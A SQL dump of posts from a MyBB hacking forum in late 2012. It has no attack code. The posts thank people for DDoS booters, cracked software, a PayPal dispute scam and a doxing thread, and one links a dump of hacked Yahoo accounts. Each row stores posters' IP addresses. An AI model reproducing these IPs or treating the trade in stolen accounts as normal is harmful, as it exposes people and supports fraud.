this giveaway, need a MC account :D [/quote] PMed you also! :) [/quote] He didn\'t say \"post here and pm me\" he said post/pm method :P [/quote] Oh sorry, but I PM the accounts, do I still need to do that?', '67.181.154.90', '1135975002', '0', '0', '0', '0', '1', 'f89eddbbf6e1f9cbf418eb527c98c651', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7186', '1212', '7171', '30', 'RE: Floristbooter v4.0.1 ~ Proof ~ Sleek Design ~ Custom Coded', '0', '54', 'Sin Cara', '1352270762', 'Thanks for the share mate.', '119.154.4.6', '2006582278', '1', '0', '0', '0', '1', '058c612bfbcd011729ca00ba6faafb34', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7187', '861', '7172', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1352271750', '[quote=\'iTzIpod\' pid=\'7172\' dateline=\'1352258290\'] Good job L33tHacking! :D Keep up the activity. Hoping Obama wins. :) [/quote] Obama WON! :cool: I was also hoping he won and he did win indeed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd38a41f8172797711d07c37de8c57dab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7188', '1204', '7159', '3', 'RE: We are L33T', '0', '1', 't3h jok3r', '1352271787', '[quote=\'iTzIpod\' pid=\'7159\' dateline=\'1352254966\'] I\'ve contributed a lot to that section! :p [/quote] Proof: 1K posts but don\'t worry I\'m getting there bro HAHAHA :evil:', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b6db1562582f85446a3d5fb117ff8ca8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7189', '1219', '7180', '44', 'RE: FIFA 13 Receipt', '0', '62', 'R?????zo?', '1352273719', 'thanks for this, I will try now :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'a67df31d443942280e56db47172556de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7190', '1214', '7174', '43', 'RE: Tons of PIDs', '0', '62', 'R?????zo?', '1352273771', 'Thanks bro, apreciatted :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '89a2836fa7242642e031ac06746dcabf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7191', '1209', '7167', '15', 'RE: WinRAR cracked', '0', '62', 'R?????zo?', '1352273906', 'NICE! I had this so long ago and now I\'m sick of this error I could not find it anywhere. Thanks alot.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e41576a7ad9d0027bb4b1eb9c66c54b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7192', '1208', '7166', '9', 'RE: Steady $8 a Day [EXPLOIT]', '0', '62', 'R?????zo?', '1352273962', 'Will try, thanks for this :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6a1bc6a8a12d117283da982bc313ac72', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7193', '1220', '0', '12', 'Big list Hacking tutorials with .txt', '0', '62', 'R?????zo?', '1352276913', '[align=center]Heres a preview: [img]http://i.imgur.com/2Ykm9.png[/img] [lock]http://rapidshare.com/files/73671961/1000HTT.rar Mirror: http://rapidshare.com/files/10659370...aded_Em_Ku.rar[/lock][/align]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '51db202838ce717a4bbc8b1450dc8123', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7194', '1216', '7177', '52', 'RE: [Release]Skype Resolver & GeoIP', '0', '67', 'HoverCatz', '1352285109', 'Thanks for this share :)', '193.161.89.203', '-1046390325', '1', '0', '0', '0', '1', '1ba9ecc2318710c1b392f9d2c29d470e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7195', '1212', '7171', '30', 'RE: Floristbooter v4.0.1 ~ Proof ~ Sleek Design ~ Custom Coded', '0', '67', 'HoverCatz', '1352285595', 'Thanks bro :)', '193.161.89.204', '-1046390324', '1', '0', '0', '0', '1', '39283f1e8a9f47e320dc493dcdc2ced8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7196', '1217', '7178', '29', 'RE: Win all paypal disputes!', '0', '67', 'HoverCatz', '1352285679', 'Thanks for this :P', '193.161.89.204', '-1046390324', '1', '0', '0', '0', '1', 'e94abd17e95407efe3924362ce08578e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7197', '1221', '0', '7', 'So Obama wins...', '0', '205', 'mothered', '1352289481', 'Greetings everyone, So Obama wins his place In the White House, for yet another 4 years. What do you guys think of that, particularly those residing In the US?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '37256ce64b94d68283ad005d3fa0d232', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7198', '1215', '7175', '3', 'RE: Post/PM Allowed for ACCOUNTS Only.', '0', '82', 'iTzIpod', '1352290106', 'Agreed with OP :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2226437181809140f0f7b3eea0a14d2b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7199', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1352290219', 'I wanted him to win aswell :) Good job Obama and congratulations on winning.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fb3bc1e0ecc98dabf00b52abe6032769', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7200', '1204', '7084', '3', 'RE: We are L33T', '0', '82', 'iTzIpod', '1352290265', '10 more posts for you. Just like 500+ more posts for me until 2,000 posts. But I\'m still Top Poster?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd670aac200913b4bd35f7f1c7a8123fb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7201', '1216', '7177', '52', 'RE: [Release]Skype Resolver & GeoIP', '0', '82', 'iTzIpod', '1352290301', 'Oh my gosh I really needed one of these! I\'ll download it ASAP', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f53bb66055c16126d3f70e67a7334892', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7202', '1217', '7178', '29', 'RE: Win all paypal disputes!', '0', '82', 'iTzIpod', '1352290350', 'I wanna see what\'s inside ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fe8b5aa1dc2e4c6d390d1eae7af9e0bc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7203', '1190', '7004', '3', 'RE: New Rule', '0', '61', 'NXK', '1352293091', 'Now let\'s release some new stuff with our new system :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '7e5b226a11d4c60a4ec330da854cf908', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7204', '1221', '7197', '7', 'RE: So Obama wins...', '0', '61', 'NXK', '1352293161', 'I\'m happy that mitt didn\'t win. He would have eliminated the middle class in America.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '5d3fdee70bf23b93851aea0de9da6d73', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7205', '1195', '7185', '47', 'RE: Premium Minecraft Accounts', '0', '61', 'NXK', '1352293263', '[quote=\'Purps™\' pid=\'7185\' dateline=\'1352265009\'] [quote=\'t3h jok3r\' pid=\'7184\' dateline=\'1352263997\'] [quote=\'Purps™\' pid=\'7181\' dateline=\'1352263004\'] [quote=\'NXK\' pid=\'7176\' dateline=\'1352258763\'] http://l33thacking.net/thread-1215.html [/quote] I\'m not using Post and PM me, I PM them. [hr] [quote=\'iTzIpod\' pid=\'7131\' dateline=\'1352236739\'] You haven\'t PMed me yet :p [/quote] Sorry, I Pmed you. :) [hr] [quote=\'VirtualLegend\' pid=\'7120\' dateline=\'1352230420\'] I Want to join this giveaway, need a MC account :D [/quote] PMed you also! :) [/quote] He didn\'t say \"post here and pm me\" he said post/pm method :P [/quote] Oh sorry, but I PM the accounts, do I still need to do that? [/quote] You\'re allowed to do this. That\'s what the thread I posted earlier was stating.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'f60ac18947c63091a07e8e31af0689dc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7206', '1220', '7193', '12', 'RE: Big list Hacking tutorials with .txt', '0', '325', 'Perfection', '1352296702', 'Holy shit. That\'s a lot of stuff. Thanks for the share! Will put this into use. EDIT: Both links are dead. :(', '107.204.89.253', '1808554493', '0', '0', '325', '1352296753', '1', 'b45a8caacd09c1a9c5d6504553edf92d', '0', '1352296753'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7207', '1208', '7166', '9', 'RE: Steady $8 a Day [EXPLOIT]', '0', '53', 'sirchamp', '1352304520', 'I also will try this. Posting to unlock the download link..', '81.161.18.1', '1369510401', '1', '0', '0', '0', '1', '0cbbfb762f6c5af14ef4bde57cd2fd9d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7208', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '150', 'MinecraftGeek', '1352308927', 'Is Kasual a bully or something?', '109.145.197.193', '1838269889', '0', '0', '150', '1352325099', '1', '33edf1a4a5429ed4e8ab874b1c65142c', '0', '1352325099'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7344', '1209', '7167', '15', 'RE: WinRAR cracked', '0', '1', 't3h jok3r', '1352534038', 'Looks like you are presenting a project lol. Thanks for the share.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c476a193b136e9fdb60c5533366ab163', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7210', '1212', '7171', '30', 'RE: Floristbooter v4.0.1 ~ Proof ~ Sleek Design ~ Custom Coded', '0', '53', 'sirchamp', '1352314462', 'Thanks alot. Need this... :D', '27.230.66.100', '468075108', '1', '0', '0', '0', '1', 'd0bfea7eb207cb79eb6afb2e56b4ee66', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7211', '1217', '7178', '29', 'RE: Win all paypal disputes!', '0', '53', 'sirchamp', '1352314590', 'Post to unlock .......Thanks btw', '193.29.189.16', '-1055015664', '1', '0', '0', '0', '1', 'eb29451869f82087375ef042c1ae752b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7212', '1195', '7045', '47', 'RE: Premium Minecraft Accounts', '0', '228', 'VirtualLegend', '1352315328', 'Thank you so much Purps You\'re Awesome :D', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '8faf587eedc4eed45212cbe112801d2f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7213', '1208', '7166', '9', 'RE: Steady $8 a Day [EXPLOIT]', '0', '228', 'VirtualLegend', '1352315449', 'Gonna try it out for you guys :D', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '7e6f752aca956a200374276b628a3a41', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7214', '1213', '7173', '34', 'RE: Black Sleek Thread Design .PSD', '0', '228', 'VirtualLegend', '1352315542', 'Looks Nice, Did you made it?', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'a84ba94f5ad200df291e3c0b96774c92', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7215', '1219', '7180', '44', 'RE: FIFA 13 Receipt', '0', '228', 'VirtualLegend', '1352315615', 'Nice Share, Hope i can SE Fifa 13', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'a1db5f025c7e8acb456f02e2667f0b0f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7216', '1218', '7179', '17', 'RE: Camdecoy bitch available here', '0', '228', 'VirtualLegend', '1352315847', 'I Can see the download link !!! Without posting !!!!!!', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '414c35883cc92d9ef4d2fc196e5ad000', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7217', '1219', '7180', '44', 'RE: FIFA 13 Receipt', '0', '257', 'XxTREYZxX', '1352316618', 'Thanks foe this cant wait to find out.', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '0a819ccfb131d4909f4282e139f56cfe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7218', '1215', '7175', '3', 'RE: Post/PM Allowed for ACCOUNTS Only.', '0', '257', 'XxTREYZxX', '1352316992', 'I will be using this alot. Because i am the minecraft man.', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '93b04211311f0b86ddb5d2c8e9598409', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7219', '1215', '7175', '3', 'RE: Post/PM Allowed for ACCOUNTS Only.', '0', '228', 'VirtualLegend', '1352317366', 'Now everyone will understand it', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '4e8eb903f7b64acc200a5434b50601f9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7220', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '222', 'Exposé', '1352318123', 'Haha lmao...yeh sorry guys', '74.67.7.114', '1245906802', '1', '0', '0', '0', '1', '3962099c14a76d2f2b6ea96fbfcf88b0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7221', '1217', '7178', '29', 'RE: Win all paypal disputes!', '0', '228', 'VirtualLegend', '1352321629', 'I WANT IT :D Seems Useful', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'fe8e32e4f676b14a09dd976b244d997c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7222', '1214', '7174', '43', 'RE: Tons of PIDs', '0', '228', 'VirtualLegend', '1352322172', 'What does PID means? Just asking', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'bade26da158ba4ce1bba2f06951e6396', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7223', '1218', '7179', '17', 'RE: Camdecoy bitch available here', '0', '67', 'HoverCatz', '1352326281', 'cuz ure a mod :p', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', '1fb6a5597de1310b1cfb5c8affa73fde', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7224', '1208', '7166', '9', 'RE: Steady $8 a Day [EXPLOIT]', '0', '67', 'HoverCatz', '1352326602', 'thanks for this :) edit: this doesnt work for me.', '178.74.57.144', '-1303758448', '1', '0', '67', '1352327299', '1', '25dd470619a32b1c641f62521bd24d5b', '0', '1352327299'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7225', '1221', '7197', '7', 'RE: So Obama wins...', '0', '1', 't3h jok3r', '1352328882', 'I\'m glad Obama won. If Romney would have won then he would have kicked out native Americans and separated African Americans.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5e9f65c035eb5645e535e757180586e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7226', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '82', 'iTzIpod', '1352331026', '@Expose, what happened to your site?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2180a76d2826a220b974d73f2bb2f95f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7227', '1078', '7208', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '1', 't3h jok3r', '1352333629', 'Finally site is back up. [quote=\'MinecraftGeek\' pid=\'7208\' dateline=\'1352308927\'] Is Kasual a bully or something? [/quote] He was a major leaker, he steals others work and claims it as his own and leaked 60% of L33T Hackings content.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '37787c36ee953f78601e1725b4ca335e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7228', '1203', '7164', '21', 'RE: Jok3r Manual DoSing sites method', '0', '1', 't3h jok3r', '1352333802', '[quote=\'iTzIpod\' pid=\'7164\' dateline=\'1352255308\'] @t3h jok3r, you should add credits to the OP who made those threads Credits to @iTzIpod (Me) @Timmy @spacefish36 [/quote] The links bring them to the thread on LH which has the original posters name so I believe it\'s good and it\'s up to Timmy to update it or not or maybe he didn\'t add any credits because he doesn\'t want anyone to be in trouble.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '89e9905ae9babff4c475009cc5a61146', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7229', '1204', '7200', '3', 'RE: We are L33T', '0', '1', 't3h jok3r', '1352333858', '[quote=\'iTzIpod\' pid=\'7200\' dateline=\'1352290265\'] 10 more posts for you. Just like 500+ more posts for me until 2,000 posts. But I\'m still Top Poster? [/quote] Yeah you are the top poster and I think I\'m the second.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5da364473da56006ab786d0155b50d86', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7230', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '205', 'mothered', '1352346695', 'Hence, what goes around, comes around. Good work mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'db1f441d863c4108ed3e81a2d92492e4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7231', '1220', '7193', '12', 'RE: Big list Hacking tutorials with .txt', '0', '205', 'mothered', '1352346839', 'Judging by what Perfection documented above, If you can please re-up, that\'ll be great. Thanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '85c4aae885cf00637ae4188f590516ae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7232', '1222', '0', '13', '400,000 Hacked Yahoo Accounts Dumps', '0', '9', 'p420', '1352349546', 'Okay, so a group called D33D hacked over 400,00+ yahoo accounts and i still have the file so i thought i might share it with you guys.The file was to big to post on pastebin or upload to LH so i had to upload it to zippyshare. [lock][url=http://www8.zippyshare.com/v/10655363/file.html]Click here[/url][/lock] It\'s TXT file if you want to be on the safe side then run it on sandboxie or upload it to virustotal.', '72.231.24.165', '1223104677', '0', '0', '9', '1352391961', '1', 'de6638a02199fb27882bb6898c4924ed', '0', '1352391961'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7233', '1223', '0', '69', '[Release] IP Manager', '0', '9', 'p420', '1352349889', 'Here is a IP Manager Why Not Just Use Notepad? [list] [*]Because this program looks awesome [*]Easily accessible [*]Friendly UI [*]Noob Friendly [*]Notepad is stupid =3 [/list] What\'s To Come? [list] [*]Copy IP on Right Click [*]Updates Checker [*]Ad Spaces (allow you to advertise within the program) (?) [*]User Registration (?) [/list] (?) = Thinking about, is not definite. [lock] Download Link: http://www.mediafire.com/?y3tah52sp288ag3 Virus Scan: 0/43 https://www.virustotal.com/file/8f8b1732fe4b4da0fd232fe521d9e65a55d23a76660532b8e7f22071a39b0728/analysis/1332204222/ [/lock] Credits: Forgot who created this, I found this on my PCs notepad.', '72.231.24.165', '1223104677', '0', '0', '9', '1352350158', '1', '7c968e42d3441188ce6ebc58cbcd9f9d', '0', '1352350158'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, 